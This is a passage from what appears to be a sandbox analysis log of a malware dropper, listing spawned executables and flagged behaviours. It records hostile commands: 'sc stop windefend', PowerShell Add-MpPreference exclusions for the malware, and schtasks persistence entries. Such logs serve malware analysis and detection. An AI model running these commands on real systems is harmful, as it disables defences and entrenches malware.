C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
-
C:\Users\Admin\Documents\S3CRqe36iff2_Nv6VBKbQpQw.exe"C:\Users\Admin\Documents\S3CRqe36iff2_Nv6VBKbQpQw.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 2403⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\RJdm3ls_W_5VxM1V2T9DXdH0.exe"C:\Users\Admin\Documents\RJdm3ls_W_5VxM1V2T9DXdH0.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\RJdm3ls_W_5VxM1V2T9DXdH0.exe"C:\Users\Admin\Documents\RJdm3ls_W_5VxM1V2T9DXdH0.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\bfd4L5Z4LBZHBpciPielEr_1.exe"C:\Users\Admin\Documents\bfd4L5Z4LBZHBpciPielEr_1.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\ruGjMJliWgX5nR0pm0TwFFCX.exe"C:\Users\Admin\Documents\ruGjMJliWgX5nR0pm0TwFFCX.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 2763⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\PsolucquGJn2LMUk30q2DGq7.exe"C:\Users\Admin\Documents\PsolucquGJn2LMUk30q2DGq7.exe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Documents\fvb8NG4vNomxEhKkfbBUqv26.exe"C:\Users\Admin\Documents\fvb8NG4vNomxEhKkfbBUqv26.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\fvb8NG4vNomxEhKkfbBUqv26.exe"C:\Users\Admin\Documents\fvb8NG4vNomxEhKkfbBUqv26.exe"3⤵
-
-
-
C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe"C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\02ba5c54-5ea3-4ce2-91dd-d7ea856bcf88\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\02ba5c54-5ea3-4ce2-91dd-d7ea856bcf88\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\02ba5c54-5ea3-4ce2-91dd-d7ea856bcf88\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\02ba5c54-5ea3-4ce2-91dd-d7ea856bcf88\test.bat"4⤵
-
C:\Windows\system32\sc.exesc stop windefend5⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe3⤵
-
-
-
C:\Users\Admin\Documents\j0sUeBlDf1wxCAeeqZqYWjvc.exe"C:\Users\Admin\Documents\j0sUeBlDf1wxCAeeqZqYWjvc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\j0sUeBlDf1wxCAeeqZqYWjvc.exe"C:\Users\Admin\Documents\j0sUeBlDf1wxCAeeqZqYWjvc.exe"3⤵
-
-
-
C:\Users\Admin\Documents\F5yFWE1LUrF6bRZvC7tK_NaV.exe"C:\Users\Admin\Documents\F5yFWE1LUrF6bRZvC7tK_NaV.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\2j_km2DuQ1MuXjIYLHc6KD_q.exe"C:\Users\Admin\Documents\2j_km2DuQ1MuXjIYLHc6KD_q.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\HcoG3_mfZG59xXZ79oX3hhty.exe"C:\Users\Admin\Documents\HcoG3_mfZG59xXZ79oX3hhty.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Company\NewProduct\inst1.exe"C:\Program Files (x86)\Company\NewProduct\inst1.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\h9h_NpkpM446vmWTnqNXfbIA.exe"C:\Users\Admin\Documents\h9h_NpkpM446vmWTnqNXfbIA.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\o2dobHH61A0I_mrTH1VIjxMA.exe"C:\Users\Admin\Documents\o2dobHH61A0I_mrTH1VIjxMA.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 3163⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe"C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
-
-
